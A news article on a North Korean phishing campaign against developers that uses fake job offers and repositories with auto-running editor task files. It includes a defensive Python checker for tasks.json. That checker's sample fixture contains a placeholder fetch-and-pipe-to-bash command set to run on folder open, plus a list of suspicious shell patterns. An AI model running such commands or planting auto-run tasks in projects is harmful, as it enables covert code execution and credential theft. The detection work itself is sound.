UNK_DeadDrop: North Korean Hackers Target Developers

North Korean hackers have launched a sweeping new campaign against software developers. The attackers rely on fake job postings and offers to review someone else’s code. According to Proofpoint, they have already targeted employees at nearly one hundred organizations across the financial, technology, education, and cryptocurrency sectors. Researchers track this activity under the name UNK_DeadDrop.

How the Campaign Lures Victims

The operation revolves around popular collaborative development platforms. Potential victims receive emails offering a job or asking them to review an open-source project. These messages contain links to GitHub repositories that appear to be genuine technical assignments, cryptocurrency tools, or AI-related projects.

Once a developer downloads the repository, they are prompted to open it in Visual Studio Code or Cursor. Hidden inside is a special task file capable of automatically launching malicious scripts. Cursor proves especially dangerous in this scenario. While Visual Studio Code normally warns users before running such tasks, Cursor executes them immediately upon opening the project, with no additional prompts.
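A defender-side check for the task-file behaviour described above, added here as an example and not code from the Proofpoint report or the campaign: it scans a repository's `.vscode/tasks.json` for tasks that start on folder open and highlights commands a reviewer should look at before opening the project in an editor. It assumes the auto-run trigger is VS Code's documented `runOptions.runOn: "folderOpen"` field (the article does not name the exact field), and the sample tasks.json is constructed, with placeholder commands.

```python
"""Flag VS Code / Cursor task definitions that execute automatically on folder open.
Added example, not from the Proofpoint report. Assumes the auto-start trigger is
VS Code's documented runOptions.runOn: "folderOpen" field; the sample below is
constructed and its commands are placeholders, not real campaign artifacts."""
import json
import re

# Constructed sample of a .vscode/tasks.json (placeholder commands, .invalid domain).
SAMPLE_TASKS_JSON = """{
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell",
     "command": "curl -s https://example.invalid/setup.sh | bash",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "postinstall", "type": "process", "command": "node",
     "args": ["scripts/install.js"],
     "runOptions": {"runOn": "folderOpen"}}
  ]
}"""

# Substrings a reviewer would want highlighted inside an auto-run command.
SUSPICIOUS_PATTERNS = [r"\bcurl\b", r"\bwget\b", r"\|\s*(ba)?sh\b",
                       r"\bpowershell\b", r"\bbase64\b"]

def strip_jsonc_comments(text):
    """tasks.json allows // and /* */ comments; remove them before json.loads."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)  # whole-line comments only

def find_autorun_tasks(tasks_json_text):
    """Return one finding per task that runs on folder open.
    Finding: {"label", "command", "suspicious": [matched patterns]}."""
    data = json.loads(strip_jsonc_comments(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue  # manual tasks need a user action; not the auto-run case
        cmd = " ".join([str(task.get("command", ""))]
                       + [str(a) for a in task.get("args", [])])
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd)]
        findings.append({"label": task.get("label", "<unnamed>"),
                         "command": cmd, "suspicious": hits})
    return findings

if __name__ == "__main__":
    for f in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"auto-run task {f['label']!r}: {f['command']} -> "
              f"{f['suspicious'] or 'no known pattern'}")
```

Because Cursor runs such tasks without a prompt, running this check (or simply reading `tasks.json`) before opening an unfamiliar repository is the point at which the described attack can still be stopped.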

Different Payloads for Different Operating Systems

From this point, the attack unfolds differently depending on the victim’s operating system. On Linux and macOS, the attackers install a modified version of the open-source tool Overlord, turning the device into a remotely controlled node. Windows users face a different approach altogether. There, the malicious code runs inside the editor’s own components and tries to avoid leaving obvious traces on disk.

The Real Target: Crypto Wallets and Credentials

The attackers’ primary goal is to steal digital assets and login credentials. Their malware harvests cryptocurrency wallet contents, browser extension data, saved passwords, authentication files, and other valuable information. On macOS and Linux, the attackers go a step further by displaying fake system prompts to capture the user’s password. From there, they attempt to gain elevated privileges and extract data from the system’s keychain storage.

Hundreds of Phishing Emails in Six Weeks

Over a six-week period, researchers logged more than 250 phishing emails tied to this campaign. The attackers used the names of real companies alongside fictitious cryptocurrency projects as cover. Common lures included job offers for roles such as Full-Stack Engineer and Agent Lead Developer, along with requests to review code or test smart-contract development tools. More recently, the attackers shifted toward distributing projects related to payment systems for AI agents.

How UNK_DeadDrop Compares to Contagious Interview

In terms of methodology, UNK_DeadDrop resembles the well-known North Korean campaign Contagious Interview, which similarly hunted for developers and cryptocurrency assets. However, Proofpoint researchers point out several key differences. This newer group leans heavily on mass email distribution, operates its own infrastructure, and embeds malicious components directly inside repositories rather than relying on external servers to deliver payloads. Proofpoint's full technical breakdown of the campaign is available for further details.

A Growing and More Organized Threat

The report’s authors believe North Korean operations against developers are becoming larger in scale and more organized overall. By shifting from targeted social media contacts toward large-scale email campaigns, the attackers reach far more potential victims. Moreover, by abusing trusted development tools, they sidestep suspicion and bypass many existing security defenses.
